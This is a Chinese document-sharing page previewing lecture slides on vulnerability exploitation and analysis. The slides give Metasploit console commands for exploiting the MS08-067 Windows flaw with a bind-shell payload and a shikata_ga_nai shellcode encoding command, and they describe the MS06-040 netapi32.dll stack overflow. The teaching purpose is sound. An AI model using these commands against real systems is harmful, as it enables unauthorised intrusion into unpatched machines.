欢迎来到天天文库
浏览记录
ID:41920321
大小:556.50 KB
页数:9页
时间:2019-09-05
《《漏洞利用与分析》课件》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库。
1、漏洞的利用分析与挖掘汇报人:吴凯漏洞的利用Metosploit相关介绍Metasploit是一个很强大的入侵工具集,包含了900多种流行的操作系统及应用软件的漏洞,以及224个shellcode从它出生开始就是最强的漏洞利用和编写工具。具体使用情况以MS08-067漏洞为例,整个入侵过程由如下几个命令组成:useexploit/windows/ms08-067-netapisetpayloadwindows/shell/bind-tcpsetRhostip地址setport端口号exploitshellcode的重编码编码命令举例:usewindo
2、ws/execsetCMDnotepad.exegenerate-b"x00"-eshikata_ga_nai-tc漏洞分析此次分析以MS06-040这个典型的栈溢出为例ms06-040的主要问题在于netapi32.dll这个动态链接库中的导出函数存在缓冲溢出,即netpwpathcanonicalize()函数中的栈溢出漏洞编译漏洞触发poc代码并运行后,就可以进行动态调试分析了漏洞函数中存在着一次wcscat函数调用,它先将arg-4所指的字符串复制到栈中,再将arg-1的长字符串连接在末尾,导致栈溢出漏洞触发过程漏洞挖掘
此文档下载收益归作者所有
